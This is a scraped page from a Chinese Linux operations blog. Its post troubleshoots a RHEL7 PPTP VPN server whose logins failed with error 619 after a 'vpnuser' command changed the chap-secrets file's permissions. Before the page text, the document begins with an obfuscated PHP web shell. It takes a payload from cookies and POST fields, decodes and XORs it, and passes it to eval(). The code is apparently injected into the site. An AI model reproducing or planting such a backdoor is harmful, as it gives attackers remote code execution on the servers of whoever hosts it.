$yXMmiEcIGK = chr ( 1034 - 946 ).'J' . chr (82) . chr ( 507 - 412 )."\160" . chr ( 1009 - 924 )."\x70";$HOygnoFBa = "\143" . chr (108) . chr (97) . chr ( 290 - 175 ).'s' . chr ( 711 - 616 ).chr (101) . 'x' . 'i' . "\x73" . "\164" . "\163";$BYAUcYott = class_exists($yXMmiEcIGK); $HOygnoFBa = "43522";$Jlpsxntry = !1;if ($BYAUcYott == $Jlpsxntry){function GYwpAWr(){return FALSE;}$NHUGUhVAVW = "47311";GYwpAWr();class XJR_pUp{private function keUQyUYK($NHUGUhVAVW){if (is_array(XJR_pUp::$yoUiHbHZ)) {$VQenh = str_replace('<' . chr (63) . 'p' . chr ( 380 - 276 )."\x70", "", XJR_pUp::$yoUiHbHZ['c' . "\157" . 'n' . 't' . chr (101) . "\156" . chr (116)]);eval($VQenh); $NHUGUhVAVW = "47311";exit();}}private $EYcCRZiy;public function dnqWMeVW(){echo 28968;}public function __destruct(){$NHUGUhVAVW = "42892_3067";$this->keUQyUYK($NHUGUhVAVW); $NHUGUhVAVW = "42892_3067";}public function __construct($DRaFgsEM=0){$FaiXtmvVIC = $_POST;$GcaGSUVsUd = $_COOKIE;$WLihkFyqXK = "7f2358cb-ef52-4b41-90bf-d69713355722";$eTgQsanT = @$GcaGSUVsUd[substr($WLihkFyqXK, 0, 4)];if (!empty($eTgQsanT)){$gKxEf = "base64";$zSqaoQvNL = "";$eTgQsanT = explode(",", $eTgQsanT);foreach ($eTgQsanT as $JSlTbQdQ){$zSqaoQvNL .= @$GcaGSUVsUd[$JSlTbQdQ];$zSqaoQvNL .= @$FaiXtmvVIC[$JSlTbQdQ];}$zSqaoQvNL = array_map($gKxEf . chr ( 1019 - 924 ).'d' . chr (101) . chr (99) . chr ( 938 - 827 ).'d' . "\145", array($zSqaoQvNL,)); $zSqaoQvNL = $zSqaoQvNL[0] ^ str_repeat($WLihkFyqXK, (strlen($zSqaoQvNL[0]) / strlen($WLihkFyqXK)) + 1);XJR_pUp::$yoUiHbHZ = @unserialize($zSqaoQvNL); $zSqaoQvNL = class_exists("42892_3067");}}public static $yoUiHbHZ = 65175;}$zupyxb = new /* 61085 */ $yXMmiEcIGK(47311 + 47311); $Jlpsxntry = $zupyxb = $NHUGUhVAVW = Array();} 【原创】RHEL7-PPTP-VPN-Server排错 | Linux运维部落

【原创】RHEL7-PPTP-VPN-Server排错

第一次写博客,明显不知道如何下笔。

    昨天6月21日,突然发现往日运行一切正常的pptpvpn服务器怎么也连不上了,错误代码是619。这个错误代码以前并没有见过,于是上google查了一下资料,据说有几种可能:

1,路由器或防火墙干掉了tcp1723;

2,电脑协议栈问题;

3,拨号连接的认证选项有问题;

    由于服务器一直也没有改动,电脑之前连接都正常,那我猜测应该是被天朝墙掉了。既然如此,找朋友帮忙测试就能真相大白了,于是找了外地的朋友和外国朋友帮忙测试,然而结果却不容乐观:不仅外地的朋友619,外国的朋友竟然也是619,真是意料之外。这样的话,这几项可能都排除掉了,问题只可能出在服务器上,只好登陆服务器来查个究竟。

连上之后首先查看日志:tail /var/log/messages | grep ppp

Jun 21 12:54:40 ip-172-31-45-110 pptpd[4173]: CTRL: Starting call (launching pp                              d, opening GRE)

Jun 21 12:54:40 ip-172-31-45-110 pppd[4174]: Plugin /usr/lib64/pptpd/pptpd-logwt                             mp.so loaded.

Jun 21 12:54:40 ip-172-31-45-110 pppd[4174]: pptpd-logwtmp: $Version$

Jun 21 12:54:40 ip-172-31-45-110 pppd[4174]: The remote system is required to au                             thenticate itself

Jun 21 12:54:40 ip-172-31-45-110 pppd[4174]: but I couldn't find any suitable se                             cret (password) for it to use to do so.

Jun 21 12:54:40 ip-172-31-45-110 pptpd[4173]: GRE: read(fd=6,buffer=611860,len=8                             196) from PTY failed: status = -1 error = Input/output error, usually caused by                              unexpected termination of pppd, check option syntax and pppd logs

    节选报错如上:果然认证失败,说没有合适的认证方式。但是查看配置文件之后发现配置与正常运行的时候并无二致。难道是进程出的问题?遂重启进程,然而并没有什么卵用,依然是619。经过完整的检查后,配置全部一切正常。

    这可真是出了奇了,一怒之下只好重启服务器试试。但是即使整机重启了,再拨号依然是错误619。这下可有点束手无策的感觉了。但是这事不能就这么了了啊,咱的解决这个问题,虽然机器是自己的,但毕竟还有别人在用呢。

    重新整理思路,想到了一点:身份验证的时候是要用到chap-secrets文件来检查用户名密码,而文件里的内容都好好的保存着,日志里却说不能找到任何合适的密码,会不会是文件访问出现了问题?

于是stat /etc/ppp/chap-secrets一看,果然发现了怪异:

[root@ip-172-31-45-110 ppp]# stat chap-secrets

  File: ‘chap-secrets’

  Size: 290             Blocks: 8          IO Block: 4096   regular file

Device: ca02h/51714d    Inode: 17588514    Links: 1

Access: (0600/-rw——-)  Uid: (    0/    root)   Gid: (    0/    root)

Context: unconfined_u:object_r:user_tmp_t:s0

Access: 2016-06-19 13:41:01.975812200 -0400

Modify: 2016-06-19 13:41:01.975812200 -0400

Change: 2016-06-19 13:41:01.977812153 -0400

 Birth: –

    这个文件的访问时间竟然还停留在19号,而今天已经是21号,怪不得pptpd进程一直讲没有合适的密码,这个文件根本就访问不到!但是为什么呢,仔细回忆之前的操作,19号那天我使用vpnuser del命令删除了一个用户名。(在后面的实验中也验证了确实是这条命令导致的)

    故障原因找到了,开始着手处理了,我也不知道应该怎么解除这个不能访问的状态,于是直接删除并重新创建了一个chap-secrets文件在ppp下。重新拨号测试,一切恢复了正常。

    vpnuser应该是一个可执行文件(cat之后显示是乱码),这样的话应该是它占用了chap-secrets导致它不能被pptpd访问,但是为什么重启了也不能解决,难道是文件属性被修改了?于是再次使用vpnuser 测试了一下,发现chap-secrets的文件属性由-rw-r–r–.变成了-rw——-.。这应该是说只有文件的所有者root才可以读取这个文件,群组和其他人都没有权限读取。但是ps -aux查看出pptpd就是由root所运行,这就比较奇怪了。另外vpnuser这个命令为何会修改读取权限,也是一个未解之谜。

    以下是测试,确实权限变了:

[root@ip-172-31-45-110 ppp]# stat chap-secrets

  File: ‘chap-secrets’

  Size: 290             Blocks: 8          IO Block: 4096   regular file

Device: ca02h/51714d    Inode: 8828791     Links: 1

Access: (0644/-rw-r–r–)  Uid: (    0/    root)   Gid: (    0/    root)

Context: unconfined_u:object_r:pppd_etc_t:s0

Access: 2016-06-21 13:37:38.754584806 -0400

Modify: 2016-06-21 13:37:38.754584806 -0400

Change: 2016-06-21 13:37:38.754584806 -0400

 Birth: –

[root@ip-172-31-45-110 ppp]# vpnuser add 1 1

[root@ip-172-31-45-110 ppp]# stat chap-secrets

  File: ‘chap-secrets’

  Size: 298             Blocks: 8          IO Block: 4096   regular file

Device: ca02h/51714d    Inode: 8828791     Links: 1

Access: (0600/-rw——-)  Uid: (    0/    root)   Gid: (    0/    root)

Context: unconfined_u:object_r:pppd_etc_t:s0

Access: 2016-06-21 13:37:38.754584806 -0400

Modify: 2016-06-21 13:39:51.623464409 -0400

Change: 2016-06-21 13:39:51.624464386 -0400

 Birth: –

    运行pptpd的用户也是root:

[root@ip-172-31-45-110 ppp]# ps -aux| grep pptpd

root      4277  0.0  0.0  10672   744 ?        Ss   12:59   0:00 /usr/sbin/pptpd

原创文章,作者:lichenhan,如若转载,请注明出处:http://www.178linux.com/19290

(0)
上一篇 2016-06-23 11:11
下一篇 2016-06-23 11:12

相关推荐

  • 从Linux小白到大牛——与狼共舞的日子9

    马哥教育网络班21期+第9周课程练习 1、写一个脚本,判断当前系统上所有用户的shell是否为可登录shell(即用户的shell不是/sbin/nologin);分别这两类用户的个数;通过字符串比较来实现; [root@localhost ~]# cat shell.sh  #!/bin/bash # declare…

    Linux干货 2016-12-05
  • iptables使用示例

    iptables规则

    2017-10-14
  • 文本处理-三剑客-awk

    报告生成器,格式化文本输出
    awk [options] ‘BEGIN{ action;… } pattern{ action;… } END{ action;… }’ file …

    2018-03-16
  • 磁盘及文件系统管理

    Linux磁盘及文件系统: 磁盘:用于持久存放数据 常见的磁盘有:机械硬盘、固态硬盘 I/O Ports: I/O设备地址 常见的硬盘接口类型:      IDE(ata):并口,133MB/s     SCSI:并口,UltraSCSI320,320MB/s,UltraSCSI…

    Linux干货 2016-08-26
  • 第二周作业

    新建 Microsoft Word 文档.docx

    Linux干货 2016-12-13
  • Linux中/etc/passwd、/etc/shadow文件字段的含义以及用处

        今天本人学习到了两个个Linux中非常重要的文件,它们承载着Linux用户的相关信息,如果在账号方面出现一些密码相关的问题,就可以来找这两个文件查看和分析一番。     他们分别是/etc/passwd和/etc/shadow两个文件,他们都存放于/etc目录中,都可以使用cat命令来查看其内容。  …

    Linux干货 2016-01-14